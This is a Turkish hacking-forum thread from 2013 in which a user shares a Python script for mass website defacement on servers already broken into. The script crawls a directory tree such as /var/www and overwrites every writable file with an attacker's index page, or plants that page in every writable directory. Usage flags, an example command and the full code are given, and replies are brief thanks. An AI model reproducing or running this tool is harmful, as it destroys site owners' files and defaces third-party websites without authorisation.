İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

Toplu index Basma Python

03-07-2013 13:07
#1
Dexterli - ait Kullanıcı Resmi (Avatar)
Tasarımcı
Üyelik tarihi:
05/2013
Nereden:
antalya
Mesajlar:
2.537
Teşekkür (Etti):
1500
Teşekkür (Aldı):
1931
Konular:
271
Ticaret:
(0) %
Girdiğiniz serverda, yazılabilir dosya ve dizinlere indexinizi kopyalayacak bir python betiktir.

Kullanımı :

-r, ROOT

Taranmasını istediğiniz dizinin yolunu yazın. Parametreyi kullanmazsanız scripti çalıştırdığınız dizinden başlanır.

-c, CIKTI

Taranan dizinlerin ve dosyaların çıktısını istiyorsanız bu parametreyi kullanın. Daha sonraki parametreyle çıktıyı dosyaya mı yoksa ekrana mı istediğinizi belirtebilirsiniz.

-o, OUTPUT

Önceki parametrede bahsettiğim gibi çıktıyı almak istediğiniz dosya ismini belirtebilirsiniz. Belirtmezseniz ve -c parametresini kullanırsanız ekrana yazacaktır.

-t, TARA

Taranacak tipi belirler. dosya ve dizin olmak üzere iki tip mevcuttur. Dosya derseniz index atarken yazma izni olan dosyaların üzerine yazar. Dizin derseniz yazma izni olan dizinlerde index dosyasının ismiyle ve içeriğiyle yeni bir dosya oluşturur. İkisini bir arada kullanabilirsiniz.

-i, INDEX

Eğer taranan dosya veya dizinlere index atmak istiyorsanız index dosyasının yolunu belirtin.

Örnek kullanım :

Kod: [Seç]
python masterhack.py -t dosya dizin -c -i mhtindex.html -r /var/www

Python Kodları :


Kod:
Kod:
import os, argparse, sys

parser = argparse.ArgumentParser()
parser.add_argument('-r', dest='root', default='.')
parser.add_argument('-c', dest="cikti", action='store_true', default=False)
parser.add_argument('-t', dest='tara', nargs="+", choices=['dosya', 'dizin'], required=True)
parser.add_argument('-o', dest="output", type=argparse.FileType('w'), default=sys.stdout)
parser.add_argument('-i', dest='index', type=argparse.FileType('r'), default=False)


args = parser.parse_args()

writable = [os.path.join(root, path) for (root, dirs, files) in os.walk(args.root) for path in files+dirs if os.access(os.path.join(root, path), os.W_OK)]
writableFiles = [file for file in writable if os.path.isfile(file)]
writableDirs = [dir for dir in writable if os.path.isdir(dir)]

indexSource = args.index.read()

if 'dosya' in args.tara:
 if args.index:
  for file in writableFiles:
   print >> open(file, 'w+'), indexSource

 if args.cikti:
  print >> args.output, "\n".join(writableFiles)

if 'dizin' in args.tara:
 if args.index:
  for dir in writableDirs:
   print >> open(os.path.join(dir, args.index.name), 'w+'), indexSource

 if args.cikti:
  print >> args.output, "\n".join(writableDirs)

Kaynak: http://masterhack.org/web-hacking/toplu-index-basma-python-t8454.0.html#ixzz2XyYIEdAQ
crackerl, glads, dark logic, by ramos Teşekkür etti.

03-07-2013 13:13
#2
crackerl - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2013
Mesajlar:
167
Teşekkür (Etti):
67
Teşekkür (Aldı):
23
Konular:
5
Ticaret:
(0) %
çok iyi
03-07-2013 13:15
#3
glads - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2013
Mesajlar:
88
Teşekkür (Etti):
51
Teşekkür (Aldı):
18
Konular:
0
Ticaret:
(0) %
yararlı bir çalışma olmuş teşekkürler
03-07-2013 13:25
#4
BladeGhost - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2013
Nereden:
İzmir
Mesajlar:
276
Teşekkür (Etti):
30
Teşekkür (Aldı):
18
Konular:
22
Ticaret:
(0) %
Paylaşım için teşekkürler
03-07-2013 13:29
#5
94loyka55 - ait Kullanıcı Resmi (Avatar)
E-Mail onayı yapılmamış üye
Üyelik tarihi:
01/2013
Mesajlar:
546
Teşekkür (Etti):
62
Teşekkür (Aldı):
25
Konular:
101
Ticaret:
(0) %
güzel paylaşım

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı